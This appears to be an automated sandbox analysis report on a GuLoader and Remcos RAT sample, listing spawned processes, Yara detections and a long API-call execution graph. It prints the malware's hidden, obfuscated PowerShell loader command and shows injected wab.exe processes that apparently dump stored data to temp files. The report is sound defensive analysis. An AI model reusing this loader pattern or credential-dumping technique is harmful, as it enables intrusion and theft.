                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden ; $Tangsnarrerne=Get-Content 'C:\Users\user\AppData\Local\Temp\humles\kvarterslag\Menneskeliggrelsens.Lyn';$Ebeneous122=$Tangsnarrerne.SubString(52669,3);.$Ebeneous122($Tangsnarrerne)
                                          Imagebase:0x2f0000
                                          File size:433'152 bytes
                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.3056196109.000000000BE0A000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:high
                                          Has exited:true

                                          Target ID:3
                                          Start time:14:21:08
                                          Start date:10/05/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff66e660000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:4
                                          Start time:14:21:09
                                          Start date:10/05/2024
                                          Path:C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
                                          Imagebase:0x1c0000
                                          File size:236'544 bytes
                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:9
                                          Start time:14:22:19
                                          Start date:10/05/2024
                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                          Imagebase:0x750000
                                          File size:516'608 bytes
                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.3385414455.0000000002DFE000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.3393823082.00000000087CC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.3393823082.00000000087DD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.3393823082.00000000087B1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:moderate
                                          Has exited:false

                                          Target ID:10
                                          Start time:14:22:40
                                          Start date:10/05/2024
                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\apzqjktfdlnytnymteytleohyelguybueg"
                                          Imagebase:0x750000
                                          File size:516'608 bytes
                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate
                                          Has exited:true

                                          Target ID:11
                                          Start time:14:22:40
                                          Start date:10/05/2024
                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\cjmbkce"
                                          Imagebase:0x750000
                                          File size:516'608 bytes
                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate
                                          Has exited:true

                                          Target ID:12
                                          Start time:14:22:40
                                          Start date:10/05/2024
                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\mlstdvoafb"
                                          Imagebase:0x750000
                                          File size:516'608 bytes
                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate
                                          Has exited:true

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:27.8%
                                            Dynamic/Decrypted Code Coverage:0%
                                            Signature Coverage:21.5%
                                            Total number of Nodes:1251
                                            Total number of Limit Nodes:44
                                            execution_graph 3667 4019c0 3668 402a07 18 API calls 3667->3668 3669 4019c7 3668->3669 3670 402a07 18 API calls 3669->3670 3671 4019d0 3670->3671 3672 4019d7 lstrcmpiA 3671->3672 3673 4019e9 lstrcmpA 3671->3673 3674 4019dd 3672->3674 3673->3674 2774 404fc2 2775 404fe3 GetDlgItem GetDlgItem GetDlgItem 2774->2775 2776 40516e 2774->2776 2820 403ebc SendMessageA 2775->2820 2778 405177 GetDlgItem CreateThread FindCloseChangeNotification 2776->2778 2779 40519f 2776->2779 2778->2779 2893 404f56 OleInitialize 2778->2893 2781 4051ca 2779->2781 2782 4051b6 ShowWindow ShowWindow 2779->2782 2783 4051ec 2779->2783 2780 405054 2785 40505b GetClientRect GetSystemMetrics SendMessageA SendMessageA 2780->2785 2784 405228 2781->2784 2787 405201 ShowWindow 2781->2787 2788 4051db 2781->2788 2825 403ebc SendMessageA 2782->2825 2829 403eee 2783->2829 2784->2783 2794 405233 SendMessageA 2784->2794 2792 4050ca 2785->2792 2793 4050ae SendMessageA SendMessageA 2785->2793 2790 405221 2787->2790 2791 405213 2787->2791 2826 403e60 2788->2826 2797 403e60 SendMessageA 2790->2797 2843 404e84 2791->2843 2798 4050dd 2792->2798 2799 4050cf SendMessageA 2792->2799 2793->2792 2800 4051fa 2794->2800 2801 40524c CreatePopupMenu 2794->2801 2797->2784 2821 403e87 2798->2821 2799->2798 2854 405b99 2801->2854 2805 4050ed 2808 4050f6 ShowWindow 2805->2808 2809 40512a GetDlgItem SendMessageA 2805->2809 2806 405282 2811 40528b TrackPopupMenu 2806->2811 2807 40526f GetWindowRect 2807->2811 2812 405119 2808->2812 2813 40510c ShowWindow 2808->2813 2809->2800 2810 405151 SendMessageA SendMessageA 2809->2810 2810->2800 2811->2800 2814 4052a9 2811->2814 2824 403ebc SendMessageA 2812->2824 2813->2812 2815 4052c5 SendMessageA 2814->2815 2815->2815 2817 4052e2 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 2815->2817 2818 405304 SendMessageA 2817->2818 2818->2818 2819 405326 GlobalUnlock SetClipboardData CloseClipboard 2818->2819 2819->2800 2820->2780 2822 405b99 18 API calls 2821->2822 2823 403e92 SetDlgItemTextA 2822->2823 2823->2805 2824->2809 2825->2781 2827 403e67 2826->2827 2828 403e6d SendMessageA 2826->2828 2827->2828 2828->2783 2830 403f06 GetWindowLongA 2829->2830 2840 403f8f 2829->2840 2831 403f17 2830->2831 2830->2840 2832 403f26 GetSysColor 2831->2832 2833 403f29 2831->2833 2832->2833 2834 403f39 SetBkMode 2833->2834 2835 403f2f SetTextColor 2833->2835 2836 403f51 GetSysColor 2834->2836 2837 403f57 2834->2837 2835->2834 2836->2837 2838 403f68 2837->2838 2839 403f5e SetBkColor 2837->2839 2838->2840 2841 403f82 CreateBrushIndirect 2838->2841 2842 403f7b DeleteObject 2838->2842 2839->2838 2840->2800 2841->2840 2842->2841 2844 404e9f 2843->2844 2852 404f42 2843->2852 2845 404ebc lstrlenA 2844->2845 2846 405b99 18 API calls 2844->2846 2847 404ee5 2845->2847 2848 404eca lstrlenA 2845->2848 2846->2845 2850 404ef8 2847->2850 2851 404eeb SetWindowTextA 2847->2851 2849 404edc lstrcatA 2848->2849 2848->2852 2849->2847 2850->2852 2853 404efe SendMessageA SendMessageA SendMessageA 2850->2853 2851->2850 2852->2790 2853->2852 2864 405ba6 2854->2864 2855 405dc9 2856 40525c AppendMenuA 2855->2856 2888 405b77 lstrcpynA 2855->2888 2856->2806 2856->2807 2858 405c47 GetVersion 2858->2864 2859 405da0 lstrlenA 2859->2864 2860 405b99 10 API calls 2860->2859 2864->2855 2864->2858 2864->2859 2864->2860 2865 405cbf GetSystemDirectoryA 2864->2865 2866 405cd2 GetWindowsDirectoryA 2864->2866 2868 405b99 10 API calls 2864->2868 2869 405d49 lstrcatA 2864->2869 2870 405d06 SHGetSpecialFolderLocation 2864->2870 2872 405a5e RegOpenKeyExA 2864->2872 2877 405de2 2864->2877 2886 405ad5 wsprintfA 2864->2886 2887 405b77 lstrcpynA 2864->2887 2865->2864 2866->2864 2868->2864 2869->2864 2870->2864 2871 405d1e SHGetPathFromIDListA CoTaskMemFree 2870->2871 2871->2864 2873 405a91 RegQueryValueExA 2872->2873 2874 405acf 2872->2874 2875 405ab2 RegCloseKey 2873->2875 2874->2864 2875->2874 2884 405dee 2877->2884 2878 405e56 2879 405e5a CharPrevA 2878->2879 2881 405e75 2878->2881 2879->2878 2880 405e4b CharNextA 2880->2878 2880->2884 2881->2864 2883 405e39 CharNextA 2883->2884 2884->2878 2884->2880 2884->2883 2885 405e46 CharNextA 2884->2885 2889 40564f 2884->2889 2885->2880 2886->2864 2887->2864 2888->2856 2890 405655 2889->2890 2891 405668 2890->2891 2892 40565b CharNextA 2890->2892 2891->2884 2892->2890 2900 403ed3 2893->2900 2895 404fa0 2896 403ed3 SendMessageA 2895->2896 2898 404fb2 OleUninitialize 2896->2898 2897 404f79 2897->2895 2903 401389 2897->2903 2901 403eeb 2900->2901 2902 403edc SendMessageA 2900->2902 2901->2897 2902->2901 2905 401390 2903->2905 2904 4013fe 2904->2897 2905->2904 2906 4013cb MulDiv SendMessageA 2905->2906 2906->2905 3675 4042c5 3676 4042f1 3675->3676 3677 404302 3675->3677 3736 40538c GetDlgItemTextA 3676->3736 3678 40430e GetDlgItem 3677->3678 3685 40436d 3677->3685 3680 404322 3678->3680 3684 404336 SetWindowTextA 3680->3684 3688 4056bd 4 API calls 3680->3688 3681 404451 3734 4045ec 3681->3734 3738 40538c GetDlgItemTextA 3681->3738 3682 4042fc 3683 405de2 5 API calls 3682->3683 3683->3677 3689 403e87 19 API calls 3684->3689 3685->3681 3690 405b99 18 API calls 3685->3690 3685->3734 3687 403eee 8 API calls 3692 404600 3687->3692 3693 40432c 3688->3693 3694 404352 3689->3694 3695 4043e1 SHBrowseForFolderA 3690->3695 3691 404481 3696 405712 18 API calls 3691->3696 3693->3684 3700 405624 3 API calls 3693->3700 3697 403e87 19 API calls 3694->3697 3695->3681 3698 4043f9 CoTaskMemFree 3695->3698 3699 404487 3696->3699 3701 404360 3697->3701 3702 405624 3 API calls 3698->3702 3739 405b77 lstrcpynA 3699->3739 3700->3684 3737 403ebc SendMessageA 3701->3737 3704 404406 3702->3704 3707 40443d SetDlgItemTextA 3704->3707 3711 405b99 18 API calls 3704->3711 3706 404366 3710 405ea2 3 API calls 3706->3710 3707->3681 3708 40449e 3709 405ea2 3 API calls 3708->3709 3717 4044a6 3709->3717 3710->3685 3712 404425 lstrcmpiA 3711->3712 3712->3707 3714 404436 lstrcatA 3712->3714 3713 4044e0 3740 405b77 lstrcpynA 3713->3740 3714->3707 3716 4044e7 3718 4056bd 4 API calls 3716->3718 3717->3713 3722 40566b 2 API calls 3717->3722 3723 404531 3717->3723 3719 4044ed GetDiskFreeSpaceA 3718->3719 3721 40450f MulDiv 3719->3721 3719->3723 3721->3723 3722->3717 3733 40459b 3723->3733 3741 40466d 3723->3741 3724 4045be 3749 403ea9 KiUserCallbackDispatcher 3724->3749 3726 40140b 2 API calls 3726->3724 3727 40458d 3729 404592 3727->3729 3730 40459d SetDlgItemTextA 3727->3730 3731 40466d 21 API calls 3729->3731 3730->3733 3731->3733 3732 4045da 3732->3734 3750 40425a 3732->3750 3733->3724 3733->3726 3734->3687 3736->3682 3737->3706 3738->3691 3739->3708 3740->3716 3742 404687 3741->3742 3743 405b99 18 API calls 3742->3743 3744 4046bc 3743->3744 3745 405b99 18 API calls 3744->3745 3746 4046c7 3745->3746 3747 405b99 18 API calls 3746->3747 3748 4046f8 lstrlenA wsprintfA SetDlgItemTextA 3747->3748 3748->3727 3749->3732 3751 404268 3750->3751 3752 40426d SendMessageA 3750->3752 3751->3752 3752->3734 2907 4023c6 2918 402b11 2907->2918 2909 4023d0 2922 402a07 2909->2922 2912 4023e3 RegQueryValueExA 2913 402409 RegCloseKey 2912->2913 2914 402403 2912->2914 2915 40266d 2913->2915 2914->2913 2928 405ad5 wsprintfA 2914->2928 2919 402a07 18 API calls 2918->2919 2920 402b2a 2919->2920 2921 402b38 RegOpenKeyExA 2920->2921 2921->2909 2923 402a13 2922->2923 2924 405b99 18 API calls 2923->2924 2925 402a34 2924->2925 2926 4023d9 2925->2926 2927 405de2 5 API calls 2925->2927 2926->2912 2926->2915 2927->2926 2928->2913 2929 403548 2930 403560 2929->2930 2931 403552 CloseHandle 2929->2931 2936 40358d 2930->2936 2931->2930 2937 40359b 2936->2937 2938 403565 2937->2938 2939 4035a0 FreeLibrary GlobalFree 2937->2939 2940 405454 2938->2940 2939->2938 2939->2939 2977 405712 2940->2977 2943 405493 2946 4055c1 2943->2946 2991 405b77 lstrcpynA 2943->2991 2944 40547c DeleteFileA 2972 403571 2944->2972 2946->2972 3010 405e7b FindFirstFileA 2946->3010 2947 4054b9 2948 4054cc 2947->2948 2949 4054bf lstrcatA 2947->2949 2992 40566b lstrlenA 2948->2992 2950 4054d2 2949->2950 2953 4054e0 lstrcatA 2950->2953 2955 4054eb lstrlenA FindFirstFileA 2950->2955 2953->2955 2955->2946 2975 40550f 2955->2975 2958 40564f CharNextA 2958->2975 2959 40540c 5 API calls 2960 4055fb 2959->2960 2961 405615 2960->2961 2964 4055ff 2960->2964 2965 404e84 25 API calls 2961->2965 2962 4055a0 FindNextFileA 2966 4055b8 FindClose 2962->2966 2962->2975 2967 404e84 25 API calls 2964->2967 2964->2972 2965->2972 2966->2946 2968 40560c 2967->2968 2969 405a2b 40 API calls 2968->2969 2969->2972 2971 405454 64 API calls 2971->2975 2973 404e84 25 API calls 2973->2962 2974 404e84 25 API calls 2974->2975 2975->2958 2975->2962 2975->2971 2975->2973 2975->2974 2996 405b77 lstrcpynA 2975->2996 2997 40540c 2975->2997 3005 405a2b 2975->3005 3016 405b77 lstrcpynA 2977->3016 2979 405723 3017 4056bd CharNextA CharNextA 2979->3017 2982 405474 2982->2943 2982->2944 2983 405de2 5 API calls 2989 405739 2983->2989 2984 405764 lstrlenA 2985 40576f 2984->2985 2984->2989 2986 405624 3 API calls 2985->2986 2988 405774 GetFileAttributesA 2986->2988 2987 405e7b 2 API calls 2987->2989 2988->2982 2989->2982 2989->2984 2989->2987 2990 40566b 2 API calls 2989->2990 2990->2984 2991->2947 2993 405678 2992->2993 2994 405689 2993->2994 2995 40567d CharPrevA 2993->2995 2994->2950 2995->2993 2995->2994 2996->2975 3023 405800 GetFileAttributesA 2997->3023 3000 405439 3000->2975 3001 405427 RemoveDirectoryA 3003 405435 3001->3003 3002 40542f DeleteFileA 3002->3003 3003->3000 3004 405445 SetFileAttributesA 3003->3004 3004->3000 3026 405ea2 GetModuleHandleA 3005->3026 3009 405a53 3009->2975 3011 405e91 FindClose 3010->3011 3012 4055e5 3010->3012 3011->3012 3012->2972 3013 405624 lstrlenA CharPrevA 3012->3013 3014 4055ef 3013->3014 3015 40563e lstrcatA 3013->3015 3014->2959 3015->3014 3016->2979 3018 4056e8 3017->3018 3019 4056d8 3017->3019 3021 40564f CharNextA 3018->3021 3022 405708 3018->3022 3019->3018 3020 4056e3 CharNextA 3019->3020 3020->3022 3021->3018 3022->2982 3022->2983 3024 405812 SetFileAttributesA 3023->3024 3025 405418 3023->3025 3024->3025 3025->3000 3025->3001 3025->3002 3027 405ec9 GetProcAddress 3026->3027 3028 405ebe LoadLibraryA 3026->3028 3029 405a32 3027->3029 3028->3027 3028->3029 3029->3009 3030 40589d lstrcpyA 3029->3030 3031 4058c6 3030->3031 3032 4058ec GetShortPathNameA 3030->3032 3054 405825 GetFileAttributesA CreateFileA 3031->3054 3034 405901 3032->3034 3035 405a25 3032->3035 3034->3035 3037 405909 wsprintfA 3034->3037 3035->3009 3036 4058d0 CloseHandle GetShortPathNameA 3036->3035 3038 4058e4 3036->3038 3039 405b99 18 API calls 3037->3039 3038->3032 3038->3035 3040 405931 3039->3040 3055 405825 GetFileAttributesA CreateFileA 3040->3055 3042 40593e 3042->3035 3043 40594d GetFileSize GlobalAlloc 3042->3043 3044 405a1e CloseHandle 3043->3044 3045 40596f ReadFile 3043->3045 3044->3035 3045->3044 3046 405987 3045->3046 3046->3044 3056 40578a lstrlenA 3046->3056 3049 4059a0 lstrcpyA 3052 4059c2 3049->3052 3050 4059b4 3051 40578a 4 API calls 3050->3051 3051->3052 3053 4059f9 SetFilePointer WriteFile GlobalFree 3052->3053 3053->3044 3054->3036 3055->3042 3057 4057cb lstrlenA 3056->3057 3058 4057d3 3057->3058 3059 4057a4 lstrcmpiA 3057->3059 3058->3049 3058->3050 3059->3058 3060 4057c2 CharNextA 3059->3060 3060->3057 3076 4014ca 3077 404e84 25 API calls 3076->3077 3078 4014d1 3077->3078 3753 402b4c 3754 402b5b SetTimer 3753->3754 3756 402b74 3753->3756 3754->3756 3755 402bc9 3756->3755 3757 402b8e MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 3756->3757 3757->3755 3758 401ccc GetDlgItem GetClientRect 3759 402a07 18 API calls 3758->3759 3760 401cfc LoadImageA SendMessageA 3759->3760 3761 401d1a DeleteObject 3760->3761 3762 40289c 3760->3762 3761->3762 3079 40264f 3080 402a07 18 API calls 3079->3080 3081 402656 FindFirstFileA 3080->3081 3082 402679 3081->3082 3083 402669 3081->3083 3087 405ad5 wsprintfA 3082->3087 3085 402680 3088 405b77 lstrcpynA 3085->3088 3087->3085 3088->3083 3763 4024cf 3764 4024d4 3763->3764 3765 4024e5 3763->3765 3766 4029ea 18 API calls 3764->3766 3767 402a07 18 API calls 3765->3767 3770 4024db 3766->3770 3768 4024ec lstrlenA 3767->3768 3768->3770 3769 40266d 3770->3769 3771 40250b WriteFile 3770->3771 3771->3769 3089 401650 3090 402a07 18 API calls 3089->3090 3091 401657 3090->3091 3092 402a07 18 API calls 3091->3092 3093 401660 3092->3093 3094 402a07 18 API calls 3093->3094 3095 401669 MoveFileA 3094->3095 3096 401675 3095->3096 3097 40167c 3095->3097 3103 401423 3096->3103 3098 405e7b 2 API calls 3097->3098 3101 40217f 3097->3101 3100 40168b 3098->3100 3100->3101 3102 405a2b 40 API calls 3100->3102 3102->3096 3104 404e84 25 API calls 3103->3104 3105 401431 3104->3105 3105->3101 3772 403fd0 3773 403fe6 3772->3773 3780 4040f2 3772->3780 3776 403e87 19 API calls 3773->3776 3774 404161 3775 404235 3774->3775 3777 40416b GetDlgItem 3774->3777 3783 403eee 8 API calls 3775->3783 3781 40403c 3776->3781 3778 404181 3777->3778 3779 4041f3 3777->3779 3778->3779 3785 4041a7 6 API calls 3778->3785 3779->3775 3786 404205 3779->3786 3780->3774 3780->3775 3782 404136 GetDlgItem SendMessageA 3780->3782 3784 403e87 19 API calls 3781->3784 3803 403ea9 KiUserCallbackDispatcher 3782->3803 3788 404230 3783->3788 3789 404049 CheckDlgButton 3784->3789 3785->3779 3791 40420b SendMessageA 3786->3791 3792 40421c 3786->3792 3801 403ea9 KiUserCallbackDispatcher 3789->3801 3791->3792 3792->3788 3795 404222 SendMessageA 3792->3795 3793 40415c 3796 40425a SendMessageA 3793->3796 3794 404067 GetDlgItem 3802 403ebc SendMessageA 3794->3802 3795->3788 3796->3774 3798 40407d SendMessageA 3799 4040a4 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 3798->3799 3800 40409b GetSysColor 3798->3800 3799->3788 3800->3799 3801->3794 3802->3798 3803->3793 3804 4014d6 3805 4029ea 18 API calls 3804->3805 3806 4014dc Sleep 3805->3806 3808 40289c 3806->3808 3110 401dd8 3111 402a07 18 API calls 3110->3111 3112 401dde 3111->3112 3113 402a07 18 API calls 3112->3113 3114 401de7 3113->3114 3115 402a07 18 API calls 3114->3115 3116 401df0 3115->3116 3117 402a07 18 API calls 3116->3117 3118 401df9 3117->3118 3119 401423 25 API calls 3118->3119 3120 401e00 ShellExecuteA 3119->3120 3121 401e2d 3120->3121 3173 40155b 3174 401577 ShowWindow 3173->3174 3175 40157e 3173->3175 3174->3175 3176 40289c 3175->3176 3177 40158c ShowWindow 3175->3177 3177->3176 3809 401edc 3810 402a07 18 API calls 3809->3810 3811 401ee3 GetFileVersionInfoSizeA 3810->3811 3812 401f06 GlobalAlloc 3811->3812 3815 401f5c 3811->3815 3813 401f1a GetFileVersionInfoA 3812->3813 3812->3815 3814 401f2b VerQueryValueA 3813->3814 3813->3815 3814->3815 3816 401f44 3814->3816 3820 405ad5 wsprintfA 3816->3820 3818 401f50 3821 405ad5 wsprintfA 3818->3821 3820->3818 3821->3815 3822 4025dd 3823 4025e4 3822->3823 3825 402849 3822->3825 3824 4029ea 18 API calls 3823->3824 3826 4025ef 3824->3826 3827 4025f6 SetFilePointer 3826->3827 3827->3825 3828 402606 3827->3828 3830 405ad5 wsprintfA 3828->3830 3830->3825 3831 4035e0 3832 4035eb 3831->3832 3833 4035f2 GlobalAlloc 3832->3833 3834 4035ef 3832->3834 3833->3834 3840 4018e3 3841 40191a 3840->3841 3842 402a07 18 API calls 3841->3842 3843 40191f 3842->3843 3844 405454 71 API calls 3843->3844 3845 401928 3844->3845 3846 4018e6 3847 402a07 18 API calls 3846->3847 3848 4018ed 3847->3848 3849 4053a8 MessageBoxIndirectA 3848->3849 3850 4018f6 3849->3850 3178 401f68 3179 401f7a 3178->3179 3180 402028 3178->3180 3181 402a07 18 API calls 3179->3181 3183 401423 25 API calls 3180->3183 3182 401f81 3181->3182 3184 402a07 18 API calls 3182->3184 3188 40217f 3183->3188 3185 401f8a 3184->3185 3186 401f92 GetModuleHandleA 3185->3186 3187 401f9f LoadLibraryExA 3185->3187 3186->3187 3189 401faf GetProcAddress 3186->3189 3187->3180 3187->3189 3190 401ffb 3189->3190 3191 401fbe 3189->3191 3192 404e84 25 API calls 3190->3192 3193 401423 25 API calls 3191->3193 3194 401fce 3191->3194 3192->3194 3193->3194 3194->3188 3195 40201c FreeLibrary 3194->3195 3195->3188 3214 4030ef #17 SetErrorMode OleInitialize 3215 405ea2 3 API calls 3214->3215 3216 403134 SHGetFileInfoA 3215->3216 3287 405b77 lstrcpynA 3216->3287 3218 40315f GetCommandLineA 3288 405b77 lstrcpynA 3218->3288 3220 403171 GetModuleHandleA 3221 403188 3220->3221 3222 40564f CharNextA 3221->3222 3223 40319c CharNextA 3222->3223 3227 4031ac 3223->3227 3224 403271 3225 403284 GetTempPathA 3224->3225 3289 4030bb 3225->3289 3227->3224 3231 40564f CharNextA 3227->3231 3235 403273 3227->3235 3228 40329c 3229 4032a0 GetWindowsDirectoryA lstrcatA 3228->3229 3230 4032f6 DeleteFileA 3228->3230 3232 4030bb 11 API calls 3229->3232 3297 402c33 GetTickCount GetModuleFileNameA 3230->3297 3231->3227 3234 4032bc 3232->3234 3234->3230 3238 4032c0 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3234->3238 3379 405b77 lstrcpynA 3235->3379 3236 40330a 3239 4033a4 ExitProcess OleUninitialize 3236->3239 3243 403390 3236->3243 3248 40564f CharNextA 3236->3248 3242 4030bb 11 API calls 3238->3242 3240 4033b9 3239->3240 3241 4034ad 3239->3241 3382 4053a8 3240->3382 3246 403530 ExitProcess 3241->3246 3252 405ea2 3 API calls 3241->3252 3245 4032ee 3242->3245 3325 403622 3243->3325 3245->3230 3245->3239 3250 403325 3248->3250 3255 40336b 3250->3255 3256 4033cf lstrcatA lstrcmpiA 3250->3256 3254 4034bc 3252->3254 3253 4033a0 3253->3239 3257 405ea2 3 API calls 3254->3257 3260 405712 18 API calls 3255->3260 3256->3239 3259 4033eb CreateDirectoryA SetCurrentDirectoryA 3256->3259 3258 4034c5 3257->3258 3261 405ea2 3 API calls 3258->3261 3262 403402 3259->3262 3263 40340d 3259->3263 3264 403376 3260->3264 3265 4034ce 3261->3265 3386 405b77 lstrcpynA 3262->3386 3387 405b77 lstrcpynA 3263->3387 3264->3239 3380 405b77 lstrcpynA 3264->3380 3268 40351c ExitWindowsEx 3265->3268 3272 4034dc GetCurrentProcess 3265->3272 3268->3246 3271 403529 3268->3271 3270 403385 3381 405b77 lstrcpynA 3270->3381 3391 40140b 3271->3391 3277 4034ec 3272->3277 3274 405b99 18 API calls 3276 40344c DeleteFileA 3274->3276 3278 403459 CopyFileA 3276->3278 3284 40341b 3276->3284 3277->3268 3278->3284 3279 4034a1 3281 405a2b 40 API calls 3279->3281 3280 405a2b 40 API calls 3280->3284 3282 4034a8 3281->3282 3282->3239 3283 405b99 18 API calls 3283->3284 3284->3274 3284->3279 3284->3280 3284->3283 3286 40348d CloseHandle 3284->3286 3388 405347 CreateProcessA 3284->3388 3286->3284 3287->3218 3288->3220 3290 405de2 5 API calls 3289->3290 3292 4030c7 3290->3292 3291 4030d1 3291->3228 3292->3291 3293 405624 3 API calls 3292->3293 3294 4030d9 CreateDirectoryA 3293->3294 3295 405854 2 API calls 3294->3295 3296 4030ed 3295->3296 3296->3228 3394 405825 GetFileAttributesA CreateFileA 3297->3394 3299 402c73 3300 402c83 3299->3300 3395 405b77 lstrcpynA 3299->3395 3300->3236 3302 402c99 3303 40566b 2 API calls 3302->3303 3304 402c9f 3303->3304 3396 405b77 lstrcpynA 3304->3396 3306 402caa GetFileSize 3307 402cc1 3306->3307 3322 402da6 3306->3322 3307->3300 3310 403072 ReadFile 3307->3310 3313 402e12 3307->3313 3321 402bcf 6 API calls 3307->3321 3307->3322 3309 402daf 3309->3300 3311 402ddf GlobalAlloc 3309->3311 3409 4030a4 SetFilePointer 3309->3409 3310->3307 3408 4030a4 SetFilePointer 3311->3408 3315 402bcf 6 API calls 3313->3315 3315->3300 3316 402dc8 3318 403072 ReadFile 3316->3318 3317 402dfa 3319 402e6c 33 API calls 3317->3319 3320 402dd3 3318->3320 3323 402e06 3319->3323 3320->3300 3320->3311 3321->3307 3397 402bcf 3322->3397 3323->3300 3323->3323 3324 402e43 SetFilePointer 3323->3324 3324->3300 3326 405ea2 3 API calls 3325->3326 3327 403636 3326->3327 3328 40363c 3327->3328 3329 40364e 3327->3329 3423 405ad5 wsprintfA 3328->3423 3330 405a5e 3 API calls 3329->3330 3331 403679 3330->3331 3333 403697 lstrcatA 3331->3333 3335 405a5e 3 API calls 3331->3335 3334 40364c 3333->3334 3414 4038e7 3334->3414 3335->3333 3338 405712 18 API calls 3339 4036c9 3338->3339 3340 403752 3339->3340 3342 405a5e 3 API calls 3339->3342 3341 405712 18 API calls 3340->3341 3343 403758 3341->3343 3344 4036f5 3342->3344 3345 403768 LoadImageA 3343->3345 3346 405b99 18 API calls 3343->3346 3344->3340 3349 403711 lstrlenA 3344->3349 3353 40564f CharNextA 3344->3353 3347 40380e 3345->3347 3348 40378f RegisterClassA 3345->3348 3346->3345 3352 40140b 2 API calls 3347->3352 3350 4037c5 SystemParametersInfoA CreateWindowExA 3348->3350 3351 403818 3348->3351 3354 403745 3349->3354 3355 40371f lstrcmpiA 3349->3355 3350->3347 3351->3253 3356 403814 3352->3356 3358 40370f 3353->3358 3357 405624 3 API calls 3354->3357 3355->3354 3359 40372f GetFileAttributesA 3355->3359 3356->3351 3360 4038e7 19 API calls 3356->3360 3361 40374b 3357->3361 3358->3349 3362 40373b 3359->3362 3363 403825 3360->3363 3424 405b77 lstrcpynA 3361->3424 3362->3354 3365 40566b 2 API calls 3362->3365 3366 403831 ShowWindow LoadLibraryA 3363->3366 3367 4038b4 3363->3367 3365->3354 3368 403850 LoadLibraryA 3366->3368 3369 403857 GetClassInfoA 3366->3369 3370 404f56 5 API calls 3367->3370 3368->3369 3371 403881 DialogBoxParamA 3369->3371 3372 40386b GetClassInfoA RegisterClassA 3369->3372 3373 4038ba 3370->3373 3374 40140b 2 API calls 3371->3374 3372->3371 3375 4038d6 3373->3375 3376 4038be 3373->3376 3374->3351 3377 40140b 2 API calls 3375->3377 3376->3351 3378 40140b 2 API calls 3376->3378 3377->3351 3378->3351 3379->3225 3380->3270 3381->3243 3383 4053bd 3382->3383 3384 4033c7 ExitProcess 3383->3384 3385 4053d1 MessageBoxIndirectA 3383->3385 3385->3384 3386->3263 3387->3284 3389 405382 3388->3389 3390 405376 CloseHandle 3388->3390 3389->3284 3390->3389 3392 401389 2 API calls 3391->3392 3393 401420 3392->3393 3393->3246 3394->3299 3395->3302 3396->3306 3398 402bf0 3397->3398 3399 402bd8 3397->3399 3402 402c00 GetTickCount 3398->3402 3403 402bf8 3398->3403 3400 402be1 DestroyWindow 3399->3400 3401 402be8 3399->3401 3400->3401 3401->3309 3404 402c31 3402->3404 3405 402c0e CreateDialogParamA ShowWindow 3402->3405 3410 405edb 3403->3410 3404->3309 3405->3404 3408->3317 3409->3316 3411 405ef8 PeekMessageA 3410->3411 3412 402bfe 3411->3412 3413 405eee DispatchMessageA 3411->3413 3412->3309 3413->3411 3415 4038fb 3414->3415 3425 405ad5 wsprintfA 3415->3425 3417 40396c 3418 405b99 18 API 